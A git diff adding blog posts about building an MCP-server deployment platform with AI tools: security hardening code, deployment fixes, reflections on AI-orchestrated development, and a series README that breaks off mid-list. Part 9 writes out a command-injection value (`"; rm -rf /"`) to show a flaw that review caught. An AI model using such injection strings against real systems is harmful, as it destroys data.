+#### 3. MCP Endpoint Access Control
+
+**Issue**: MCP endpoints were public - anyone with the URL could call tools.
+
+**Fix**: Access token authentication
+
+```python
+@router.api_route("/mcp/{deployment_id}", methods=["GET", "POST"])
+async def mcp_streamable(
+ deployment_id: str,
+ request: Request,
+ x_access_token: str = Header(None, alias="X-Access-Token")
+):
+ """MCP endpoint with access token auth"""
+ deployment = await get_deployment(deployment_id)
+
+ # Validate access token
+ if not x_access_token or x_access_token != deployment.access_token:
+ raise HTTPException(401, "Invalid or missing access token")
+
+ # ... rest of MCP proxying
+```
+
+Claude Desktop config now includes token:
+
+```json
+{
+ "mcpServers": {
+ "ticktick": {
+ "url": "https://backend.fly.dev/api/mcp/{id}",
+ "headers": {
+ "X-Access-Token": "deployment-specific-token"
+ }
+ }
+ }
+}
+```
+
+#### 4. Access Token Rotation
+
+**Issue**: If a token leaks, no way to invalidate it.
+
+**Fix**: Token rotation endpoint
+
+```python
+@router.post("/deployments/{deployment_id}/rotate-token")
+async def rotate_deployment_token(
+ deployment_id: str,
+ user: User = Depends(get_current_user)
+):
+ """
+ Rotate deployment access token.
+
+ Generates new token, invalidates old one.
+ """
+ deployment = await get_deployment(deployment_id)
+
+ # Verify ownership
+ if deployment.user_id != user.id:
+ raise HTTPException(403, "Not your deployment")
+
+ # Generate new token
+ new_token = secrets.token_urlsafe(32)
+ old_token = deployment.access_token
+
+ # Update deployment
+ deployment.access_token = new_token
+ await db.commit()
+
+ # Log rotation for security audit
+ logger.warning(
+ "Access token rotated",
+ extra={
+ "deployment_id": deployment_id,
+ "user_id": user.id,
+ "old_token_prefix": old_token[:8],
+ "new_token_prefix": new_token[:8]
+ }
+ )
+
+ return {"access_token": new_token, "message": "Token rotated successfully"}
+```
+
+**User workflow**:
+1. Token leaked? Click "Rotate Token" in UI
+2. New token generated
+3. Update Claude Desktop config with new token
+4. Old token immediately invalid
+
+### Audit Logging
+
+Added audit trail for security events:
+
+```python
+class AuditLog(Base):
+ __tablename__ = "audit_logs"
+
+ id = Column(UUID, primary_key=True, default=uuid.uuid4)
+ user_id = Column(UUID, ForeignKey("users.id"))
+ action = Column(String) # "deployment_created", "token_rotated", etc.
+ resource_id = Column(String)
+ timestamp = Column(DateTime, default=datetime.utcnow)
+ metadata = Column(JSON)
+
+# Log security events
+async def log_audit(user_id, action, resource_id, metadata=None):
+ async with get_session() as db:
+ log = AuditLog(
+ user_id=user_id,
+ action=action,
+ resource_id=resource_id,
+ metadata=metadata or {}
+ )
+ db.add(log)
+ await db.commit()
+
+# Example usage
+await log_audit(
+ user_id=user.id,
+ action="deployment_created",
+ resource_id=deployment.id,
+ metadata={"package": deployment.schedule_config["mcp_config"]["package"]}
+)
+```
+
+**Why audit logs**: Compliance, security monitoring, debugging.
+
+## Frontend Deployment to Vercel
+
+### The Problem
+
+Frontend ran locally (`localhost:3000`). No production deployment.
+
+**Steps to deploy**:
+
+1. **Environment variables** (Vercel dashboard):
+
+```env
+NEXT_PUBLIC_BACKEND_URL=https://catwalk-backend.fly.dev
+AUTH_SECRET=
+AUTH_SYNC_SECRET=
+GOOGLE_CLIENT_ID=
+GOOGLE_CLIENT_SECRET=
+```
+
+2. **Deploy**: `vercel deploy --prod`
+
+3. **Build failed**:
+
+```
+Error: Cannot find module './vitest.config.mts'
+```
+
+**Problem**: `tsconfig.json` was trying to compile Vitest config (a dev-only file).
+
+**Fix**: Exclude test configs from production build:
+
+```json
+{
+ "exclude": [
+ "node_modules",
+ "**/*.test.ts",
+ "**/*.test.tsx",
+ "**/*.mts"
+ ]
+}
+```
+
+4. **SSR error**: "useSearchParams must be wrapped in Suspense"
+
+**Problem**: SignInModal used `useSearchParams()` without Suspense boundary.
+
+**Fix**:
+
+```tsx
+// app/layout.tsx
+import { Suspense } from 'react'
+import SignInModal from '@/components/auth/SignInModal'
+
+export default function RootLayout({ children }) {
+ return (
+
+
+
+
+
+ {children}
+
+
+ )
+}
+```
+
+5. **Success**: Frontend deployed to Vercel!
+
+**Production URLs**:
+- Frontend: `https://catwalk.vercel.app`
+- Backend: `https://catwalk-backend.fly.dev`
+
+## Performance Optimizations
+
+### 1. Analysis Cache Improvements
+
+**Before**: Cache expiration checked on every request.
+
+**After**: Background cleanup task.
+
+```python
+from apscheduler.schedulers.asyncio import AsyncIOScheduler
+
+scheduler = AsyncIOScheduler()
+
+@scheduler.scheduled_job("interval", hours=1)
+async def cleanup_expired_cache():
+ """Remove expired cache entries (runs every hour)"""
+ async with get_session() as db:
+ await db.execute(
+ delete(AnalysisCache).where(
+ AnalysisCache.expires_at < datetime.utcnow()
+ )
+ )
+ await db.commit()
+
+# Start scheduler on app startup
+@app.on_event("startup")
+async def startup():
+ scheduler.start()
+```
+
+**Benefit**: Faster queries (no expiration check), database stays clean.
+
+### 2. Registry Validation Concurrency
+
+**Before**: Validate package sequentially.
+
+```python
+# Slow (2 sequential API calls)
+syntax_valid = validate_syntax(package)
+npm_exists = await validate_npm_package(package)
+```
+
+**After**: Validate concurrently.
+
+```python
+# Fast (parallel validation)
+await asyncio.gather(
+ validate_syntax(package),
+ validate_npm_package(package)
+)
+```
+
+**Improvement**: 300ms → 150ms average validation time.
+
+### 3. Database Connection Pooling
+
+**Before**: Create new connection per request.
+
+**After**: Connection pool.
+
+```python
+from sqlalchemy.ext.asyncio import create_async_engine
+
+engine = create_async_engine(
+ DATABASE_URL,
+ pool_size=20, # Max 20 connections
+ max_overflow=10, # Extra 10 if pool full
+ pool_pre_ping=True, # Check connection alive before use
+ pool_recycle=3600 # Recycle connections after 1 hour
+)
+```
+
+**Benefit**: Faster queries, fewer connection errors.
+
+## Production Checklist
+
+Before declaring "production-ready":
+
+- [x] **Tests**: 51 integration + unit tests, 89% coverage
+- [x] **Security**: CodeRabbit review passed, secrets masked, CORS restricted
+- [x] **Authentication**: JWT + OAuth, user sync working
+- [x] **Validation**: Package + credential validation
+- [x] **Error handling**: User-friendly messages, audit logging
+- [x] **Deployment**: Backend on Fly.io, frontend on Vercel
+- [x] **Monitoring**: Health checks, structured logs
+- [x] **Documentation**: API docs, troubleshooting guides
+- [x] **Performance**: Caching, connection pooling, concurrent validation
+- [ ] **Health monitoring loop**: Proactive unhealthy state detection (Phase 8)
+
+**Status**: Production-ready (with known gaps documented).
+
+## What I Learned
+
+### Where AI Excelled ✅
+- Test generation (51 tests from prompt)
+- Security patterns (secret filtering, CORS config)
+- Boilerplate (audit logging, schedulers)
+
+### Where AI Failed ❌
+- **Test quality**: Many tests too shallow (only happy path)
+- **Security thinking**: Didn't proactively suggest token rotation
+- **Edge cases**: Didn't catch timezone datetime bug
+- **Deployment**: No guidance on Vercel SSR issues
+
+### Human Expertise Required 🧠
+- **Security review**: Reading CodeRabbit feedback, prioritizing fixes
+- **Test design**: What scenarios matter? What edge cases exist?
+- **Performance tuning**: Where are bottlenecks? How to optimize?
+- **Production deployment**: Environment variables, build configs, SSR
+
+**The pattern**: AI generates code. Humans ensure **production quality**.
+
+## Up Next
+
+The platform is production-ready:
+- ✅ Comprehensive tests
+- ✅ Security hardened
+- ✅ Deployed to production (frontend + backend)
+- ✅ Performance optimized
+
+But this is just **Part 8**. There's one more story to tell: **Reflections on AI-orchestrated development**.
+
+What worked? What didn't? How has AI changed the role of the engineer? What's next?
+
+That's Part 9: The conclusion.
+
+---
+
+**Key Commits**:
+- `02f9346` - Comprehensive API hardening, refactored auth flow, major test suite expansion
+- `690fa1d` - Address security, stability, and logic review feedback
+- `d0766bf` - Fix security: refine logging, restrict cache, fix proxy
+- `27717d1` - PR #12: Testing and cache improvements
+- `937f01e` - PR #13: Security hardening
+- `890c67a` - Access token rotation for deployments
+
+**Related Files**:
+- `backend/tests/` - 51 integration and unit tests
+- `backend/app/middleware/logging.py` - Secret filtering
+- `backend/app/api/deployments.py` - Token rotation endpoint
+
+**Production URLs**:
+- Frontend: https://catwalk.vercel.app
+- Backend: https://catwalk-backend.fly.dev
+
+**Next Post**: [Part 9: Reflections - AI-Orchestrated Development](09-reflections-ai-orchestration.md)
diff --git a/blog/09-reflections-ai-orchestration.md b/blog/09-reflections-ai-orchestration.md
new file mode 100644
index 0000000..d407b53
--- /dev/null
+++ b/blog/09-reflections-ai-orchestration.md
@@ -0,0 +1,528 @@
+---
+title: "Part 9: Reflections - AI-Orchestrated Development"
+series: "Catwalk Live Development Journey"
+part: 9
+date: 2025-12-27
+updated: 2025-12-27
+tags: [AI, reflections, methodology, lessons-learned, future]
+reading_time: "18 min"
+commits_covered: "215deaa...890c67a"
+---
+
+## The Journey in Numbers
+
+December 11-23, 2025. **12 days. 86 commits. 0 lines of code written manually.**
+
+**What was built**:
+- Full-stack deployment platform
+- Next.js 15 frontend (React 19, TailwindCSS 4)
+- FastAPI backend (Python 3.12, async SQLAlchemy)
+- PostgreSQL database (Fly.io)
+- MCP Streamable HTTP implementation (2025-06-18 spec)
+- Fly Machines API integration
+- JWT authentication (NextAuth.js + custom backend)
+- Package validation (npm + PyPI registries)
+- Credential encryption (Fernet)
+- Comprehensive test suite (51 tests, 89% coverage)
+- Production deployment (Vercel + Fly.io)
+
+**The result**: A working platform that deploys MCP servers as easily as deploying to Vercel.
+
+**The method**: Strategic AI orchestration with rigorous human validation.
+
+**The question**: Does this methodology actually work?
+
+## The Central Thesis
+
+**AI can build production systems - but only with the right structure.**
+
+This isn't about "AI writes all the code." It's about **orchestrating multiple AI agents with clear specifications, quality gates, and human oversight**.
+
+Here's what I learned actually works:
+
+### What Worked: The Winning Patterns
+
+#### 1. Prompt Refinement is 80% of Success
+
+**Bad approach**: "Build me a deployment platform for MCP servers"
+
+**Good approach**:
+```
+Build a platform that:
+- Accepts GitHub URLs for MCP servers
+- Uses Claude API (via OpenRouter) with web search to analyze repos
+- Extracts: package name (npm/PyPI), env vars, tools/resources/prompts
+- Generates dynamic credential forms based on extracted requirements
+- Encrypts credentials with Fernet symmetric encryption (256-bit key)
+- Stores deployments in PostgreSQL with async SQLAlchemy
+- Validates package names against npm/PyPI registries (prevent command injection)
+- Deploys to Fly.io Machines API with isolated Firecracker VMs
+- Implements MCP Streamable HTTP transport (2025-06-18 spec)
+- Exposes stable HTTPS endpoints for Claude Desktop
+
+Tech constraints:
+- Frontend: Next.js 15 (App Router), React 19, TypeScript 5+ (no 'any' types)
+- Backend: FastAPI, Python 3.12, psycopg3 (NOT asyncpg), Pydantic 2.0
+- All async (asyncio, async SQLAlchemy)
+- Type-safe throughout
+- Must pass ruff check with zero warnings
+
+Success criteria:
+- End-to-end MCP tool calling works
+- Credentials never logged or exposed
+- Package validation prevents command injection
+- 90%+ test coverage
+```
+
+**The difference**: The detailed prompt produced production-quality code. The vague prompt produced a proof-of-concept that would need complete rewrites.
+
+**Time investment**: 30 minutes refining prompts vs 10+ hours debugging vague AI output.
+
+#### 2. Multi-AI Validation Prevents Blind Spots
+
+Different AI models have different strengths. Cross-validation catches issues.
+
+**Example: PostgreSQL driver choice**
+
+| AI Model | Recommendation | Rationale |
+|----------|----------------|-----------|
+| GPT-4 | asyncpg | "Modern async driver, well-maintained" |
+| Claude | psycopg3 | "Better SSL parameter support" |
+| Gemini | psycopg3 | "More compatible with connection strings" |
+
+**Consensus**: psycopg3 (2 out of 3)
+
+**Result**: Correct choice. asyncpg failed with Fly.io's `sslmode` parameter.
+
+**Pattern**: Where AI models agree → probably good design. Where they disagree → investigate carefully.
+
+#### 3. Context Files Enable Multi-Session Consistency
+
+AI has limited context windows. Without external memory, architectural decisions get forgotten across sessions.
+
+**The solution**: Structured markdown files as "source of truth":
+
+```
+context/
+├── CURRENT_STATUS.md # Where we are, what's next
+├── ARCHITECTURE.md # System design decisions
+├── TECH_STACK.md # Technology choices + rationale
+├── API_SPEC.md # Endpoint documentation
+└── CLAUDE.md # Known pitfalls, lessons learned
+```
+
+**Example from CLAUDE.md**:
+```markdown
+## PostgreSQL Driver Issues
+
+CRITICAL: Use psycopg3, NOT asyncpg.
+
+Fly.io provides URLs like: postgres://user:pass@host?sslmode=disable
+asyncpg does NOT support 'sslmode' parameter → crashes.
+
+Solution: Use psycopg[binary]>=3.1.0 + URL transformer in config.py:
+...
+```
+
+**Impact**: Without these files, AI tried asyncpg again in session 3. With the file, it immediately used psycopg3.
+
+**The insight**: Context engineering is as important as prompt engineering.
+
+#### 4. Automated Quality Gates Catch What Humans Miss
+
+GitHub agent pipeline:
+1. **CodeRabbit**: Security vulnerabilities (found command injection risk)
+2. **Qodo**: Edge cases and error handling
+3. **Gemini Code Assist**: Code quality and best practices
+4. **Greptile**: Integration consistency
+
+**Example: CodeRabbit caught command injection**
+
+AI-generated code:
+```python
+env = {"MCP_PACKAGE": mcp_package} # User input, unsanitized!
+```
+
+Exploit:
+```python
+mcp_package = "; rm -rf /"
+# Executes: npx -y ; rm -rf /
+```
+
+**CodeRabbit flagged this** → I added package validation against registries.
+
+**Human alone**: Might have missed this.
+**AI alone**: Generated the vulnerability.
+**AI + automated review**: Caught and fixed it.
+
+### What Didn't Work: The Failure Modes
+
+#### 1. AI Doesn't Think About Security
+
+AI-generated code often has security holes:
+
+- ❌ Command injection (user input → shell execution)
+- ❌ Secrets in logs (`logger.info(deployment.dict())` logged credentials)
+- ❌ CORS misconfiguration (`allow_origins=["*"]`)
+- ❌ Missing access control on MCP endpoints
+
+**Why**: AI is trained to make code **work**, not to make code **secure**.
+
+**Solution**: Always run security-focused reviews. Use tools like CodeRabbit. Never trust AI with security-critical code.
+
+#### 2. AI Struggles with Infrastructure Quirks
+
+AI knows general patterns but fails at platform-specific details:
+
+**Example: Fly.io private networking**
+
+AI suggested:
+```python
+machine_url = f"http://{machine_id}.fly.dev/mcp"
+```
+
+**Problem**: `.fly.dev` is public DNS. MCP machines don't have public IPs.
+
+**Correct**:
+```python
+machine_url = f"http://{machine_id}.vm.mcp-host.internal:8080/mcp"
+```
+
+**Why AI failed**: Fly.io's `.internal` DNS is specific to Fly's private network. Not common knowledge in training data.
+
+**Solution**: Deep knowledge of infrastructure platforms still requires human expertise.
+
+#### 3. AI Generates Incomplete Implementations
+
+**Example: Authentication**
+
+AI generated:
+```typescript
+async signIn({ user, account }) {
+ // TODO: Sync user to backend database
+ return true
+}
+```
+
+**I shipped this.** Users could sign in, but backend had no record of them → 401 errors everywhere.
+
+**Why**: AI knows authentication **patterns** but doesn't know **your specific architecture**.
+
+**Solution**: Always verify TODOs are resolved. Never ship commented-out functionality.
+
+#### 4. AI Can't Debug Across Systems
+
+**The 401 authentication nightmare** (Part 7):
+- Frontend generates JWT with `AUTH_SECRET`
+- Backend verifies JWT with different `AUTH_SECRET`
+- Error: "Invalid signature"
+
+**AI's suggestion**: "Check if secrets match"
+
+**Helpful, but not actionable.** AI can't:
+- Check Fly.io secrets
+- Compare `.env.local` with remote secrets
+- Trace requests through multiple systems
+
+**Human debugging required**:
+1. Manually verify secrets match
+2. Test each component separately
+3. Create troubleshooting documentation
+4. Fix the root cause (secret sync)
+
+**The insight**: AI debugs single-system issues well. Multi-system integration failures need human investigation.
+
+## The Skill Shift
+
+Building Catwalk Live changed how I think about software development.
+
+### Old Model: Writing Code
+
+**Traditional developer**:
+1. Understand requirements
+2. Design architecture
+3. **Write code line by line**
+4. Debug and test
+5. Deploy
+
+**Bottleneck**: Step 3 (writing code). Slow, error-prone, tedious.
+
+### New Model: Orchestrating AI
+
+**AI-assisted developer**:
+1. Understand requirements
+2. Design architecture
+3. **Craft detailed prompts**
+4. **Validate AI-generated code**
+5. **Orchestrate multiple AI agents**
+6. Debug (with AI assistance)
+7. Deploy
+
+**Bottleneck shift**: From writing code → validating systems.
+
+**Key skills now**:
+- ✅ **Architectural thinking**: What should be built, why, and how?
+- ✅ **Prompt engineering**: How to specify requirements precisely?
+- ✅ **System validation**: Is this code safe? Does it handle edge cases?
+- ✅ **Integration debugging**: Why are these systems not talking to each other?
+- ✅ **Quality control**: Does this meet production standards?
+
+**Skills becoming less critical**:
+- ⬇️ Syntax memorization (AI knows all frameworks)
+- ⬇️ Boilerplate generation (AI excels at this)
+- ⬇️ CRUD implementation (AI generates correctly)
+- ⬇️ API client code (AI reads OpenAPI specs)
+
+### The Role Evolution
+
+**I'm not a traditional coder anymore.** I'm a:
+
+- **System Architect**: Designing how components fit together
+- **Quality Engineer**: Validating AI output meets production standards
+- **Prompt Engineer**: Specifying requirements with precision
+- **Integration Specialist**: Debugging cross-system failures
+- **AI Orchestrator**: Coordinating multiple AI agents to build systems
+
+**Analogy**: From construction worker (building brick by brick) → construction manager (coordinating teams to build the structure).
+
+## Lessons for Future AI-Assisted Projects
+
+Based on 12 days and 86 commits, here's what I'd do again (and what I'd change):
+
+### Do Again ✅
+
+1. **Start with context files** (`AGENTS.md`, `ARCHITECTURE.md`, `CURRENT_STATUS.md`)
+ - Write these BEFORE any code
+ - Update them religiously
+ - Treat as single source of truth
+
+2. **Multi-AI validation**
+ - Cross-check architecture decisions across GPT-4, Claude, Gemini
+ - Where consensus → proceed confidently
+ - Where disagreement → investigate deeply
+
+3. **Automated review agents**
+ - Add CodeRabbit, Qodo to every PR
+ - Feed their comments back to implementing AI
+ - Create iterative improvement loop
+
+4. **Detailed prompts with constraints**
+ - Specify tech stack versions
+ - List security requirements explicitly
+ - Define success criteria
+ - Include example code patterns
+
+5. **Incremental validation**
+ - Deploy early and often
+ - Test each component as it's built
+ - Don't wait until "everything is ready"
+
+### Do Differently ❌
+
+1. **Write tests FIRST**
+ - I waited until day 10 to write tests
+ - This was a mistake
+ - Test-driven development works with AI too
+
+2. **Smaller, more frequent commits**
+ - Some commits changed 20+ files
+ - Made debugging harder
+ - One feature per commit is better
+
+3. **Security review at every stage**
+ - I only ran security review at the end
+ - Found critical issues late
+ - Should have reviewed after each feature
+
+4. **Database design upfront**
+ - Changed schema 3 times
+ - Migrations became messy
+ - Spend more time designing schema before coding
+
+5. **Document infrastructure decisions immediately**
+ - Spent hours re-learning Fly.io private networking
+ - Should have documented the first time
+ - "Future me" would thank "past me"
+
+## The Honest Assessment
+
+**Can AI build production systems without human coding?**
+
+**Answer: Yes, but...**
+
+### What AI Can Do (Proven)
+
+✅ Generate boilerplate (FastAPI routes, React components)
+✅ Implement known patterns (CRUD, authentication, validation)
+✅ Write database models and migrations
+✅ Create API clients from OpenAPI specs
+✅ Generate comprehensive test suites
+✅ Follow specific architectural constraints
+✅ Refactor code to improve readability
+
+### What AI Cannot Do (Yet)
+
+❌ Architectural decision-making (monolith vs microservices?)
+❌ Security threat modeling (what could attackers exploit?)
+❌ Infrastructure platform expertise (Fly.io quirks, AWS specifics)
+❌ Business requirement interpretation (what does the user actually need?)
+❌ Edge case discovery (what scenarios did we not think of?)
+❌ Cross-system debugging (why is auth failing between frontend and backend?)
+❌ Production trade-off evaluation (performance vs cost vs complexity?)
+
+### What Humans Must Still Do
+
+🧠 **System Architecture**: Design how components interact
+🧠 **Security Validation**: Ensure code doesn't enable attacks
+🧠 **Infrastructure Knowledge**: Understand platform-specific behavior
+🧠 **Integration Debugging**: Solve multi-system failures
+🧠 **Quality Assurance**: Validate code meets production standards
+🧠 **Product Decisions**: Prioritize features, manage scope
+
+**The insight**: AI is a powerful **amplifier** of developer productivity, not a **replacement** for developer judgment.
+
+## The Future: Where This Goes
+
+This project proved AI-orchestrated development can build production systems. But we're still early.
+
+### Near Future (1-2 years)
+
+**Expectation**: AI coding assistants become standard in every developer workflow.
+
+**Changes**:
+- IDEs integrate AI deeply (already happening: Cursor, Continue)
+- AI agents handle full features (not just code snippets)
+- Multi-agent systems become common (planning AI + implementation AI + review AI)
+- Context management becomes critical skill
+
+**Developer role shift**: Less "writing code" → more "validating systems"
+
+### Medium Future (3-5 years)
+
+**Expectation**: AI can build entire MVPs from specifications.
+
+**Requirements**:
+- Better architectural reasoning (AI makes design decisions)
+- Improved security awareness (AI proactively hardens code)
+- Infrastructure knowledge (AI understands platform specifics)
+- Self-testing capability (AI writes comprehensive tests automatically)
+
+**Developer role shift**: Focus on **what to build** (product) rather than **how to build it** (implementation).
+
+### Long Future (5-10 years)
+
+**Speculation**: AI builds complex systems with minimal human intervention.
+
+**Open questions**:
+- Can AI learn infrastructure quirks from documentation?
+- Can AI reason about security threats like humans?
+- Can AI debug emergent failures in distributed systems?
+- Can AI make architectural trade-offs (cost vs performance vs complexity)?
+
+**My intuition**: AI will get very good at **implementation** but humans will remain critical for **judgment calls**.
+
+## The Meta-Lesson
+
+This project was as much about **AI-orchestrated development methodology** as it was about building a deployment platform.
+
+**The real deliverable**: A reproducible process for building production systems with AI.
+
+**The methodology**:
+1. Refine prompts to extreme specificity
+2. Cross-validate architecture with multiple AI models
+3. Create structured context files for consistency
+4. Implement with AI (Claude Code, Cursor)
+5. Review with automated AI agents (CodeRabbit, Qodo)
+6. Debug integration issues (human expertise required)
+7. Iterate based on feedback
+8. Ship to production
+
+**Why this matters**: Software development is entering a new era. Developers who learn to **orchestrate AI effectively** will have a massive productivity advantage.
+
+**This blog series is the playbook.**
+
+## Where Catwalk Live Goes Next
+
+**Current state**: Production-ready platform with known gaps.
+
+**What works**:
+- End-to-end MCP deployment
+- Streamable HTTP proxying
+- Credential encryption
+- Package validation
+- User authentication
+- Production infrastructure
+
+**What's next (Phase 8+)**:
+- Health monitoring loop (proactive failure detection)
+- Deployment logs and metrics
+- Cost tracking per deployment
+- Vercel Functions as Fly.io alternative (edge deployment)
+- Scale-to-zero for cost optimization
+- Public MCP registry (discover and deploy)
+
+**Long-term vision**: Make MCP server deployment as simple as `git push`.
+
+## Final Thoughts
+
+December 27, 2025. Looking back at 12 days:
+
+**What surprised me**:
+- How well multi-AI validation worked
+- How bad AI is at security
+- How critical context files became
+- How much human judgment still matters
+
+**What I'm proud of**:
+- Shipping a working production system
+- Documenting the methodology completely
+- Proving AI orchestration can build real products
+- Creating a reproducible process
+
+**What I learned**:
+- AI is a tool, not magic
+- Prompt engineering is a critical skill
+- Quality gates prevent bad AI code from shipping
+- Humans make architectural and security decisions
+- The skill is shifting from "coding" to "validating systems"
+
+**The conclusion**: AI-orchestrated development **works** - but only when humans provide structure, validation, and judgment.
+
+**This is the future of software development.** And it's already here.
+
+---
+
+## Resources
+
+**This Project**:
+- [GitHub Repository](https://github.com/zenchantlive/catwalk)
+- [AI_ORCHESTRATION.md](../AI_ORCHESTRATION.md) - Complete methodology
+- [AGENTS.md](../AGENTS.md) - AI agent specifications
+- [context/](../context/) - Full knowledge base
+
+**AI Tools Used**:
+- Claude Code (Anthropic) - Primary implementation
+- Cursor - Refactoring
+- Google Gemini - Planning and validation
+- ChatGPT (GPT-4) - Cross-validation
+- CodeRabbit - Security review
+- Qodo - Edge case detection
+
+**Connect**:
+- Email: jordanlive121@gmail.com
+- Twitter: [@zenchantlive](https://twitter.com/zenchantlive)
+- LinkedIn: [Jordan Hindo](https://linkedin.com/in/jordan-hindo)
+
+---
+
+**Thank you for reading this series.** I hope it inspires you to experiment with AI-orchestrated development.
+
+**The future is being built by developers who learned to orchestrate AI. Will you be one of them?**
+
+---
+
+**Series Complete**: [Return to Overview](README.md)
+
+**Previous Post**: [Part 8: Security Hardening & Production Ready](08-security-hardening-production.md)
+
+**Share your experience**: If you build something using this methodology, I'd love to hear about it!
diff --git a/blog/README.md b/blog/README.md
new file mode 100644
index 0000000..255e1b3
--- /dev/null
+++ b/blog/README.md
@@ -0,0 +1,178 @@
+# Catwalk Live: Development Journey
+
+A blog series documenting the development of **Catwalk Live** - a Vercel-like platform for deploying Remote MCP servers to Fly.io - built entirely through AI orchestration in just 12 days.
+
+## About the Project
+
+**What**: Catwalk Live makes deploying Model Context Protocol (MCP) servers as simple as deploying to Vercel. Paste a GitHub repo URL, enter credentials, and get a production-ready MCP endpoint that Claude Desktop can immediately connect to.
+
+**Stack**:
+- Frontend: Next.js 15 (App Router), React 19, TailwindCSS 4, TypeScript 5+
+- Backend: FastAPI (Python 3.12), SQLAlchemy (async), PostgreSQL 15+
+- Infrastructure: Fly.io (Machines API), Docker
+- Development: Claude Code, Cursor, Google Gemini (multi-AI orchestration)
+
+**Timeline**: December 11-23, 2025 (12 days, 86 commits)
+
+**Context**: This project was built without manually writing code - instead using strategic AI orchestration, multi-agent coordination, and rigorous quality control. It demonstrates that AI can build production-ready systems when given proper structure, constraints, and validation.
+
+## Series Overview
+
+This series doesn't just document a technical project - it documents a **methodology**. Each post reveals how AI coding assistants can be orchestrated to build complex, production-ready systems, and where human expertise remains critical.
+
+You'll learn:
+- ✅ How to architect systems with AI assistance
+- ✅ Prompt engineering patterns that produce production-quality code
+- ✅ Multi-AI validation techniques
+- ✅ Real debugging challenges (and solutions)
+- ✅ Where AI excels and where it struggles
+- ✅ Context engineering for multi-session consistency
+
+## Posts
+
+### Part 1: [Genesis - Building a Vercel for MCP Servers](01-genesis-building-vercel-for-mcp.md)
+**Dec 11, 2025** • *The spark of an idea and the first commit*
+
+The beginning: Why build this? What problem does it solve? How do you start a complex full-stack project with AI assistance? This post covers the initial vision, tech stack decisions, and the critical choice to build with AI orchestration rather than traditional coding.
+
+**Key Topics**: Project vision, AI orchestration methodology, initial architecture, tech stack rationale
+
+### Part 2: [Foundation - Architecture & Encryption](02-foundation-architecture-encryption.md)
+**Dec 11, 2025** • *Building the core architecture and security model*
+
+Diving deep into the foundational architecture: three-layer system design, Fernet encryption for credentials, dynamic form generation from AI analysis, and the Aurora UI design system. This is where the project's architectural DNA was established.
+
+**Key Topics**: System architecture, credential encryption, database schema, dynamic forms, Aurora design system
+
+### Part 3: [The AI Analysis Engine](03-ai-analysis-engine.md)
+**Dec 11-12, 2025** • *Teaching Claude to analyze MCP repositories*
+
+How do you get an AI to analyze another developer's GitHub repository and extract deployment configuration? This post reveals the prompt engineering, caching strategy, and lessons learned from integrating Claude API with web search plugins.
+
+**Key Topics**: Prompt engineering, Claude API integration, web search plugins, caching, regex extraction
+
+### Part 4: [First Deployment - Fly.io Adventures](04-first-deployment-flyio.md)
+**Dec 12-14, 2025** • *From localhost to production*
+
+The reality of deploying to production: PostgreSQL driver nightmares (asyncpg vs psycopg3), Docker CRLF line ending bugs, missing dependencies, and database cluster failures. This post chronicles the hard-won lessons from getting the backend live on Fly.io.
+
+**Key Topics**: Dockerization, PostgreSQL drivers, Fly.io deployment, database debugging, infrastructure lessons
+
+### Part 5: [Implementing Streamable HTTP & MCP Machines](05-streamable-http-mcp-machines.md)
+**Dec 14, 2025** • *The technical heart of the platform*
+
+Building the core MCP functionality: implementing the MCP 2025-06-18 Streamable HTTP spec, integrating Fly Machines API, designing the mcp-proxy architecture, and solving Fly.io private networking challenges. This is where the platform truly came alive.
+
+**Key Topics**: MCP protocol, Streamable HTTP, Fly Machines API, mcp-proxy, private networking, protocol version negotiation
+
+### Part 6: [Building the Registry & Validation Layer](06-registry-validation.md)
+**Dec 16-19, 2025** • *Security through validation*
+
+Making the platform secure and reliable: package validation against npm/PyPI registries, credential validation, Glama registry integration, and addressing CodeRabbit's security review feedback. Security isn't an afterthought - it's a continuous practice.
+
+**Key Topics**: Package validation, npm/PyPI registry checks, credential validation, security review, command injection prevention
+
+### Part 7: [The Authentication Nightmare](07-authentication-crisis.md)
+**Dec 20-21, 2025** • *When everything breaks at once*
+
+The darkest moment: implementing JWT authentication seemed straightforward until mysterious 401 errors blocked everything. This post documents the debugging saga that revealed the subtle difference between AUTH_SECRET and AUTH_SYNC_SECRET, and why user sync was silently failing.
+
+**Key Topics**: JWT authentication, debugging 401 errors, NextAuth.js integration, user synchronization, auth troubleshooting methodology
+
+### Part 8: [Security Hardening & Production Ready](08-security-hardening-production.md)
+**Dec 21-23, 2025** • *From working to production-ready*
+
+The final sprint: comprehensive test suite (51 tests), security hardening from PR reviews, access token rotation, cache improvements, Vercel deployment fixes, and addressing every piece of automated feedback from CodeRabbit, Qodo, and Gemini Code Assist.
+
+**Key Topics**: Integration testing, security hardening, test coverage, automated PR reviews, production deployment, Vercel configuration
+
+### Part 9: [Reflections - AI-Orchestrated Development](09-reflections-ai-orchestration.md)
+**Dec 23, 2025 - Present** • *Lessons learned and the future*
+
+Looking back on 12 intense days: What worked? What didn't? Where did AI excel? Where did it fail? How has AI-assisted development changed the role of the engineer? This post synthesizes the entire journey into transferable lessons and future directions.
+
+**Key Topics**: AI orchestration lessons, context engineering, multi-agent validation, prompt refinement, where AI struggles, the future of development
+
+---
+
+## Reading Paths
+
+### Quick Read (Core Story)
+For the essential narrative in ~30 minutes:
+→ Posts 1, 3, 7, 9
+
+### Technical Deep-Dive (Full Journey)
+For engineers who want all the details:
+→ All posts in order (1-9)
+
+### Specific Topics
+
+**AI & Prompt Engineering**: Posts 1, 3, 9
+**Infrastructure & DevOps**: Posts 4, 5, 8
+**Security & Authentication**: Posts 2, 6, 7, 8
+**System Architecture**: Posts 2, 5, 6
+**MCP Protocol**: Posts 3, 5
+**Debugging War Stories**: Posts 4, 7
+
+---
+
+## Context & Documentation
+
+This blog series complements the project's extensive documentation:
+
+- **[AI_ORCHESTRATION.md](../AI_ORCHESTRATION.md)** - Complete AI methodology case study
+- **[AGENTS.md](../AGENTS.md)** - AI agent specifications & interaction protocols
+- **[context/](../context/)** - Knowledge base used to guide AI development
+- **[CURRENT_STATUS.md](../context/CURRENT_STATUS.md)** - Detailed project status and lessons learned
+- **[ARCHITECTURE.md](../context/ARCHITECTURE.md)** - Technical architecture deep-dive
+
+---
+
+## Why This Series Matters
+
+This isn't just another "I built X with AI" post. This is a **reproducible methodology** documented in real-time across an actual production system.
+
+**You'll see**:
+- The actual prompts that produced production code
+- The mistakes AI made (and how to catch them)
+- The architectural decisions that AI can't make
+- The debugging process when AI-generated code fails
+- The quality gates that prevent bad AI code from shipping
+
+**You'll learn**:
+- How to structure context for AI consistency across sessions
+- Multi-AI validation patterns
